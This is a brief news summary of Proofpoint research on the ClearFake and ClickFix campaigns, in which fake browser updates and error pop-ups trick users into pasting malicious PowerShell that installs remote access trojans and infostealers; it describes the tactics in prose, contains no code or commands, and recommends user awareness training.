June 18, 2024 at 02:40PM
Threat actors are using fake browser updates and error messages to trick users into pasting malicious PowerShell scripts, leading to malware infections. Researchers from Proofpoint identified two social engineering methods and observed the use of PowerShell in various campaigns, indicating a trend of creative attack chains. Mitigation includes user awareness and training.
Based on the meeting notes, it appears that threat actors are using fake browser updates and software fixes to trick users into cutting/copying and pasting PowerShell scripts loaded with various malware strains to infect their computers. Two main methods of social engineering were identified in these activities: one offering fake browser updates in a campaign known as ClearFake, and the other delivering error messages related to Word, Google Chrome, and OneDrive, known as “ClickFix.”
The campaigns used pop-up text boxes that suggested errors had occurred when opening documents or web pages, instructing users to copy and paste a malicious script into either the PowerShell terminal or the Windows Run dialog box to execute the script via PowerShell. The attackers used clever and authoritative social engineering in the fake error messages to prompt users to take action without pausing to consider the risk.
Additionally, the malicious scripts were delivered through compromised websites using techniques such as EtherHiding and were designed to trick users into installing “root certificates” or resolving faulty browser updates, ultimately leading to the execution of malware on the victim’s computer.
The researchers attributed these activities to threat actors tracked as TA571 and an unidentified actor. They observed at least five types of malware being delivered in this way, including remote access Trojans (RATs) and infostealers.
The researchers provided a list of indicators of compromise (IoCs) and emphasized the need for employee awareness and training within organizations to help prevent compromise on their networks. They also noted that these attack chains require significant user interaction to be successful.
Overall, the meeting notes highlight the importance of staying vigilant against social engineering tactics and adopting training programs to help users identify and report suspicious activity to their security teams.